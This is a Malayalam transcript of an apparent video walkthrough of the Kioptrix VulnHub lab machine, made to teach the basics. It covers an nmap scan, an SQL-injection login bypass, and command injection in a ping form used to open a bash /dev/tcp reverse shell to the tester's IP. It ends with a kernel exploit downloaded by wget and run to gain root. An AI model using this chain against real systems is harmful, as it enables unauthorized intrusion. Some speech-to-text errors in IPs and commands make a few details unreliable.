ഹായ് ഗൈസ്, പുതിയൊരു വീട്ടിലേക്ക് എല്ലാവർക്കും സ്വാഗതം. നമ്മൾ ഇന്ന് ചെയ്യാൻ പോകുന്നതും വൾഹബ് എന്ന് വെച്ചാൽ കുറേ വൾണറബിൾ മെഷീൻസുകൾ ഉള്ള റെപ്പോസിറ്ററീസ് ആണ്. അവിടെ നമുക്ക് ഡിഫറെൻറ്റ് മെഷീൻസ് അവൈലബിൾ ആണ്. സോ അതിലൊരു ബേസിക് മെഷീനായിട്ടുള്ള കിപ്ട്രോക്സ് എന്ന് പറയുന്ന മെഷീനാണ് ചെയ്യാൻ പോകുന്നത്. സോ ഇവിടെ വന്ന് നിങ്ങൾ ചെയ്യേണ്ടതെന്ന് വെച്ചാൽ ഇവിടെ റാർ ഫയൽ ഏതെങ്കിലും ഫോർമാറ്റ് ഡൗൺലോഡ് ചെയ്യുക. അറ്റ്ലീസ്റ്റ് വെർച്വൽ മെഷീൻ്റെ അകത്ത് വെർച്വൽ മെഷീനായിട്ട് ഇൻസ്റ്റാൾ ചെയ്യും. വെർച്വൽ ബോക്സോ അല്ലെങ്കിൽ VMware യൂസ് ചെയ്യാം. VMware ആണ് യൂസ് ചെയ്യുന്നത്. സോ VMwareൻ്റെ അകത്ത് ജസ്റ്റ് ലോഡ് ചെയ്യുമ്പോൾ നിങ്ങൾക്ക് വെർച്വൽ മെഷീൻ അപ്പാൻറ്റ് വരും. സോ എൻ്റെ മെഷീൻ ഇവിടെ അപ്പാണ്. എൻ്റെ മെഷീൻ്റെ IP അഡ്രസ്സ് എന്ന് പറയുന്നത് മെഷീൻ്റെ IP അഡ്രസ്സ് ജസ്റ്റ് കണ്ടുപിടിക്കാൻ വേണ്ടി ജസ്റ്റ് nmap എടുക്കുക, സ്കാൻ ചെയ്യുക. നിങ്ങളുടെ IP അഡ്രസ്സിൻ്റെ ഫസ്റ്റ് നമ്പർ മാറ്റിയിട്ട് ലാസ്റ്റ് നമ്പർ മാറ്റിയിട്ട് അവിടെ 0 ഇട്ടിട്ട് ഒക്ടക്റ്റിലോട്ട് മാറ്റി വരാം. 24 ഇട്ട് ജസ്റ്റ് സ്കാൻ ചെയ്യുക. അപ്പം അതിനകത്ത് ഏതൊക്കെ മെഷീൻസ് ഈ വൈഫൈ അല്ലെങ്കിൽ നെറ്റുമായിട്ട് കണക്ട് ആയിട്ടുള്ള അതിൻ്റെ ലിസ്റ്റ് കാണിക്കും. അത് നിങ്ങളുടെ മെഷീൻ ജസ്റ്റ് പിക്ക് ചെയ്തെടുക്കുക. ജസ്റ്റ് ഓരോന്നേ. സോ എൻ്റെ അകത്ത് ഇതാണ് എൻ്റെ മെഷീൻ്റെ IP അഡ്രസ്സ്. സോ എൻ്റെ പേഴ്സണൽ ഡിവൈസുകളുടെ ലിസ്റ്റ് ഇതിനകത്ത് കാണിക്കുന്നുണ്ട്. സോ ഇത് ആണ് നമ്മുടെ മെഷീൻ. ജസ്റ്റ് കൺഫേം ചെയ്യാൻ വേണ്ടി ജസ്റ്റ് nmap എടുക്കുക, ജസ്റ്റ് IP അഡ്രസ്സ് സ്കാൻ ചെയ്ത് നോക്കുക. സോ ഇതാണ് മെഷീൻ്റെ ഇപ്പോൾ ഓപ്പൺ പോർട്ടുകൾ എന്ന് പറയുന്നത്. തൊള്ളെന്ന് പറയുന്നത് SSH ഉണ്ട്, HTTP ഉണ്ട്, RCB ബൈൻഡ് ഉണ്ട്, HTTPS ഉണ്ട്, MySQL ഉണ്ട്, അങ്ങനെ പോർട്ടുകളുണ്ട്. നമ്മൾ ജസ്റ്റ് സിമ്പിൾ എക്സ്പ്ലോയിറ്റും കാര്യങ്ങളാണ്. ജസ്റ്റ് HTTP സെർവറിൽ വെബ്സൈറ്റിലോട്ട് പോവുക. അവിടെ നമുക്ക് കമാൻഡ് ഇഞ്ചക്ഷൻ ഉണ്ട്. കമാൻഡ് ഇഞ്ചക്ഷൻ വഴി റിവേഴ്സിൽ കിട്ടും. റിവേഴ്സിൽ നിന്ന് ഡയറക്റ്റ് എക്സ്പ്ലോയിറ്റ് അവൈലബിൾ. ഓൾഡ് മെഷീൻ ആയതുകൊണ്ട് കേണൽ എക്സ്പ്ലോയിറ്റുകൾ കുറേ ഉണ്ട്. ജസ്റ്റ് ഒരെണ്ണം യൂസ് ചെയ്യുക, ഡയറക്റ്റ്ലി റൂട്ടായിട്ട് കിട്ടും. സോ ഈ RPC ബൈൻഡ് എന്ന് പറയുന്നത് നമ്മുടെ മെഷീൻ്റെ അകത്തോട്ട് നമ്മൾ വെബ് സെർവേഴ്സ് കാര്യം ഡെവലപ്പ് ചെയ്യുമ്പോൾ നമ്മൾ വേറൊരു സെർവറിൽ നിന്ന് APIs ജസ്റ്റ് കോൾ ചെയ്ത് നമ്മുടെ മെഷീൻ്റെ അകത്തോട്ട് കൊണ്ടുവരും. അതുപോലെ തന്നെ അതിനുവേണ്ടി യൂസ് ചെയ്യുന്ന നമ്മുടെ മെഷീൻ്റെ അതിൽ വേറൊരു സർവീസിനെ കൊണ്ടുവരാൻ വേണ്ടി യൂസ് ചെയ്യുന്ന ഒരു പ്രോട്ടോക്കോളാണ് റിമോട്ട് RPC പ്രോട്ടോക്കോൾ എന്ന് പറയുന്നത്. RPC പ്രോട്ടോക്കോൾ എന്ന് പറയുന്നത് റിമോട്ട് പ്രൊസീജിയർ കോളാണ് RPC പ്രോട്ടോക്കോൾ എന്ന് പറയുന്നത്. ഇതാണ് സെയിം ആയിട്ടൊന്ന് വർക്ക് ചെയ്യുന്നത്. നമ്മളൊരു API വിളിക്കുന്നത് എങ്ങനെയാണ് അതുപോലെയാണ് ഈ പ്രോട്ടോക്കോൾ വർക്ക് ചെയ്യുന്നത്. അതിൻ്റെ ബൈൻഡ് ചെയ്തേക്കുന്ന പോർട്ടാണ് 111 എന്ന് പറയുന്നത്. സോ അത് മാത്രമേ അതിനകത്ത് നോക്കാനുള്ളതുള്ളൂ. ജസ്റ്റ് നമുക്ക് വെബ്സൈറ്റിലോട്ട് പോകാം. വെബ്സൈറ്റ് എന്ന് പറയുന്നത് 9.168.1.102. ജസ്റ്റ് IP അഡ്രസ്സ് കോപ്പി ചെയ്യുക. ഞാൻ ഓൾറെഡി ഒരു സൈറ്റൊക്കെ ഉണ്ട്. നമുക്ക് ഇവിടെ ഇങ്ങനെ ലോഗിൻ പേജ് കിട്ടും. ജസ്റ്റ് ഇവിടെ വന്നിട്ട് നമ്മളിവിടെ ഒരു SQL ഇഞ്ചക്ഷൻ നോക്കുന്നത്. ജസ്റ്റ് അഡ്മിൻ അല്ലെങ്കിൽ എന്തെങ്കിലും ഒരു നെയിം ടൈപ്പ് ചെയ്യുക. ഞാനിവിടെ ജസ്റ്റ് ഫസ്റ്റ് കോട്ട് ക്ലോസ് ചെയ്തു. ദെൻ സെക്കൻഡ് കോട്ട് ഓപ്പൺ ആക്കുന്നത് ജസ്റ്റ് 1 ആണ്. നമുക്കൊരു കോട്ട് ബാക്കി വരും. ആ ബാക്കി വന്ന കോട്ടിൻ്റെ അവിടെ നമ്മൾ ഹാഷ് ഉപയോഗിച്ചത് കമൻറ്റ് ചെയ്ത് കളയുക. ജസ്റ്റ് അതിന് ഓപ്പൺ ആയി വരും. ഈ പേജിന് ജസ്റ്റ് ഒരു കംപ്ലൈൻ്റ് ഉണ്ട് എന്ന് വെച്ചാൽ നമ്മൾ ജസ്റ്റ് സോഴ്സ് വ്യൂ ചെയ്ത് നോക്കുമ്പോൾ ഇവിടെ ബാക്കി ഇൻപുട്ട് ഫയലും പേജും കാര്യങ്ങളും ഉണ്ട്. പക്ഷേ അത് ആക്ച്വൽ പേജിൽ കാണുന്നില്ല. സോ ഞാൻ സോഴ്സ് കോഡ് ജസ്റ്റ് എഡിറ്റ് ചെയ്തിട്ട് ഈ രണ്ട് ഇൻപുട്ട് ഫീൽഡുകളും ആഡ് ചെയ്ത് കൊടുക്കുമ്പോൾ നമുക്ക് ഇങ്ങനൊരു ഫീൽഡ് വരും. സബ്മിറ്റ് ബട്ടണും അതുപോലെ തന്നെ ഇൻപുട്ട് ടൈപ്പ് ചെയ്യാനുള്ള ഇവിടെ ജസ്റ്റ് നമ്മൾ മെഷീൻ്റെ IP അഡ്രസ് കൊടുക്കും, നമുക്ക് പിങ് കിട്ടും. സോ സോഴ്സ് കോഡ് ഇങ്ങനെയാണ് വരുന്നത്. ഫോമിനകത്ത് ടേബിളുണ്ട്. ടേബിളിൻ്റെ അകത്ത് രണ്ടാമത്തെ ടേബിൾ റോയ്ക്കകത്ത് ഈ രണ്ട് സാധനം ആഡ് ചെയ്ത് കൊടുക്കുക. ആദ്യം ആക്ച്വലി വരുന്നതിൻ്റെ അകത്ത് അതില്ല. ഞാൻ കാണിക്കാം. ഇൻസ്പെക്ട് എടുക്കുക. ടേബിൾ റോയ്ക്കകത്ത് അതില്ല. ജസ്റ്റ് ഒന്ന് എഡിറ്റ് കൊടുക്കുക. എഡിറ്റ് ആയിട്ട് ഇതിൻ്റെ താഴോട്ട് ഇത് രണ്ടും ജസ്റ്റ് പേസ്റ്റ് ചെയ്യുക. ഇവിടുന്ന് ജസ്റ്റ് കോപ്പി ചെയ്തെടുക്കുക. ഇവിടുന്ന് കോപ്പി ചെയ്തു. ഇതിൻ്റെ താഴെ വന്നിട്ട് ജസ്റ്റ് പേസ്റ്റ് അടിക്കുക. സോ നമുക്ക് ആ ഫങ്ഷനാലിറ്റി കിട്ടും. ജസ്റ്റ് നമുക്ക് എക്സ്പ്ലോയിറ്റ് ചെയ്യാം.
സോ ഈ സിമ്പിൾ ആസ് ദാറ്റ്. ജസ്റ്റ് ഇവിടെ ഒരു എല്ലാം ജസ്റ്റ് ക്ലോസ് ചെയ്യുക. നമുക്ക് 120 എൻ്റെ മെഷീൻ്റെ അഡ്രസ്സ് ഒന്ന് കൊടുക്കുക, ലൂപ്പ് ബാക്ക് IP കൊടുക്കുക. ജസ്റ്റ് അത് പിങ് ചെയ്തിട്ട് നമുക്ക് റിസൾട്ട് കിട്ടും. സോ നമ്മളിവിടെ എന്താ ചെയ്യേണ്ടതെന്ന് വെച്ചാൽ നമുക്കിവിടെ കമാൻഡ് ഇൻജക്ഷനുള്ള പോസിബിലിറ്റീസ് ഉണ്ട്. ജസ്റ്റ് ഇവിടെ സാനിറ്റേഷനും കാര്യങ്ങളൊന്നും നോക്കുന്നില്ല. ജസ്റ്റ് നമ്മുടെ മെഷീൻ്റെ അകത്ത് എങ്ങനെ പിങ് വർക്കാവുന്ന നോക്കുകയാണെങ്കിൽ 127.0.0.1 ഞാനിവിടെ ഒരു സെമിക്കോളം കൊടുത്തിട്ട് ഇവിടെ ID കൊടുക്കുവാണെങ്കിൽ അത് കഴിഞ്ഞിട്ട് നമുക്ക് എൻ്റെ ID ആണ് ഇവിടെ കാണിക്കുന്നത്. സോ നമുക്കതുപോലെ അവിടെ ID കൊടുത്ത് നോക്കാം. ജസ്റ്റ് ID സബ്മിറ്റ് ചെയ്യുക. ഇത് 3 വട്ടം പിങ് ചെയ്ത് കഴിഞ്ഞിട്ട് മെഷീൻ്റെ ID നമുക്ക് കിട്ടും. ജസ്റ്റ് ലിനക്സ് കമാൻഡ്സ് ആണ് ഇതിനകത്ത് വർക്കാവുന്നത്. അപ്പാച്ചെ കമാൻഡ് ജസ്റ്റ് നമുക്ക് ഡയറക്റ്റ്ലി അവിടെ നമുക്ക് ലിസണർ സ്റ്റാർട്ട് ചെയ്യുക. നമ്മുടെ IP അഡ്രസ്സ് കൊടുക്കുക. നമുക്കിവിടെ റിവേഴ്സൽ എടുക്കാം. സോ ചെയ്യേണ്ടതെന്ന് വെച്ചാൽ ഇവിടെ വരിക. ഇതിന് പകരം bash tag I greater than /dev/tcp/IP address 192.168.1.7/9001 0 greater than 1 കൊടുക്കുക. സിസ്റ്റം സബ്മിറ്റ് ചെയ്യുക. നമുക്കൊരു ബാഷിൽ എഴുതി നമ്മൾ ഹൂമായി നോക്കും. അപ്പാച്ചയായിട്ട് കിട്ടി. സോ നമുക്ക് ഇതിനകത്ത് മെഷീൻ്റെ റിലീസും കാര്യങ്ങളും ജസ്റ്റ് ചെക്ക് ചെയ്യാൻ വേണ്ടി cat/etc/ നമ്മളിവിടെ എന്ന് വെച്ചാൽ ഈ സ്റ്റാർ സിമ്പിൾ യൂസ് ചെയ്യുന്ന വെച്ചാൽ ഒരു വൈൽഡ് കാർഡാണ്. ഈ ഫോൾഡറിൻ്റെ അകത്ത് എല്ലാം സെലക്ട് ചെയ്യുക വിത്ത് റിലീസ്. സോ CentOS റിലീസ് 4.5 ആണ് വന്നേക്കുന്നത്. സോ നമുക്കിതിൻ്റെ വേർഷൻ നോക്കാം. CentOS ആണ്. CentOS വേർഷൻ 2.269 സംതിങ് ആണ് വേർഷനാണ്. സോ നമുക്കിവിടെ വന്നിട്ട് ഇവിടെ വന്ന് സെർച്ച് എക്സ്പ്ലോയിറ്റിൻ്റെ അകത്ത് ഇതിൻ്റെ അകത്ത് ജസ്റ്റ് CentOS സെർച്ച് ചെയ്യുക. നമുക്ക് മുമ്പേ കണ്ട വേർഷൻ തന്നെ 2.4x 2.6 ആണ്. ഇത് ജസ്റ്റ് ഡൗൺലോഡ് ചെയ്യും. ഇത് മിറർ ചെയ്യാൻ വേണ്ടി ജസ്റ്റ് നമ്മൾ ഈ പാത്ത് ജസ്റ്റ് കോപ്പി ചെയ്യുക. താഴെ വേണ്ടത് മുമ്പിലത്തെ കമാൻഡ് എടുക്കുക. ഇവിടെ വന്നിട്ട് ജസ്റ്റ് ഒരു M കൊടുത്തിട്ട് നമ്മൾ ഈ പാത്ത് ജസ്റ്റ് പേസ്റ്റ് ചെയ്യുക. അത് നമ്മുടെ മെഷീൻ്റെ അകത്തോട്ട് കോപ്പി ചെയ്യുക. ഞാൻ ഓൾറെഡി കോപ്പി ചെയ്തതുകൊണ്ട് ഞാൻ ചെയ്യുന്നില്ല. നോ കൊടുക്കുക. നിങ്ങൾ അങ്ങനെ ചെയ്യുന്നത് കിട്ടും സാധനം. ഇതാണ് എക്സ്പ്ലോയിറ്റ് എന്ന് പറയുന്നത്. ഈ എക്സ്പ്ലോയിറ്റ് റൺ ചെയ്യാൻ വേണ്ടി ജസ്റ്റ് ക്യാറ്റ് ചെയ്ത് എനിക്ക് ആദ്യത്തെ കുറച്ച് ഫ്യൂ ലൈൻസ് മതി. 9.5 ജസ്റ്റ് ക്യാറ്റ് ചെയ്യുമ്പോൾ അതിനകത്ത് എങ്ങനെയാണ് ചെയ്യേണ്ടതെന്ന് കാണിക്കും. മുമ്പ് ടെയിലാണ് എടുത്ത് ഹെഡ് കൊടുക്കുവാണെങ്കിൽ കറക്റ്റ് വരുന്നതാണ്. കേണൽ എക്സ്പ്ലോയിറ്റ് ആണ്. കൂടുതൽ ഡീറ്റെയിലിനോട്ടൊന്നും പോകുന്നില്ല. ജസ്റ്റ് ഓൾഡ് മെഷീനാണ്. ഇത്രയും മെഷീനകത്ത് സപ്പോർട്ടാണ്. ജസ്റ്റ് നമുക്ക് വേണ്ടി നമുക്ക് i3 എത്ര ചെയ്യണം. ഇത് കോപ്പി ചെയ്യുക. ഈ കമാൻഡ് കോപ്പി ചെയ്യുക. ഇവിടെ വന്നിട്ട് നമ്മളൊരു പൈത്തൺ വെബ് സെർവർ HTTP സെർവർ സ്റ്റാർട്ട് ചെയ്തു. ഇനി മെഷീൻ്റെ അകത്ത് പോയിട്ട് നമ്മൾ cd/dev/shml പോവുക. ഇവിടെ എന്തൊക്കെയുണ്ടെന്ന് നോക്കും. ഞാൻ ഓൾറെഡി ഇത് ഇവിടെ മെഷീൻ ഇവിടെ കൊണ്ടുവന്നിട്ടുണ്ട്. സോ നെക്സ്റ്റ് സ്റ്റെപ്പ് എന്ന് പറയുന്നത് നിങ്ങൾ ഡൗൺലോഡ് ചെയ്തെടുക്കുക. ഡൗൺലോഡ് ചെയ്യാൻ wget 192.168.1.7 8000 വന്നേക്കുന്നത്. നമ്മുടെ സെർവർ സ്റ്റാർട്ട് ചെയ്യുക. /9545.c കൊടുക്കുക. ഡൗൺലോഡ് ചെയ്യുക. ഡൗൺലോഡ് ചെയ്തതിന് ശേഷം നമ്മൾ മുമ്പേ കോപ്പി ചെയ്ത കമാൻഡ് പേസ്റ്റ് ചെയ്യുക. നമുക്ക് ഔട്ട് ചെയ്ത് ഫോർമാറ്റ് ആവുന്നത് എനിക്ക് EXP ഫോർമാറ്റ് വരിക. അതാണ് -O എന്ന് പറയുന്നത്.
then a file name, that is 9545.c. എൻ്റർ അടിക്കുക. എൻ്റർ അടിക്കുമ്പോൾ നമുക്ക് എക്സ്പ്ലോയിറ്റ് ക്രിയേറ്റ് ആവും. എക്സ്പ്ലോയിറ്റിന് നമുക്ക് പെർമിഷൻ കൊടുക്കണം. chmod +x, then ഫയൽ നെയിം കൊടുക്കുക, then ജസ്റ്റ് എക്സിക്യൂട്ട് ചെയ്യുക. നമ്മുടെ നേരത്തെ വന്ന ഈ $സൈൻ മാറ്റിയിട്ട് ഇവിടെ ഹാഷ് വന്നു. ഹാഷ് വരുമ്പോൾ നമ്മൾ റൂട്ട് ആയിരുന്നാണ് അർത്ഥം. അപ്പോൾ നമ്മൾ ID ചെക്ക് ചെയ്ത് നോക്കുകയാണെങ്കിൽ നമ്മൾ റൂട്ട്. ഈ മെഷീൻ ഇത്രയേ ഉള്ളൂ, വളരെ ബേസിക് ആയിട്ടുള്ള മെഷീനാണ്. എന്താണ് ഇതിനകത്ത് കമാൻഡ് ഇൻഡക്ഷൻ, എന്താണ് SQL ഇൻജക്ഷൻ, എന്ത് ചെയ്യാൻ പറ്റും, ജസ്റ്റ് ബേസിക്സ് അറിയാൻ വേണ്ടിയുള്ളതാണ്.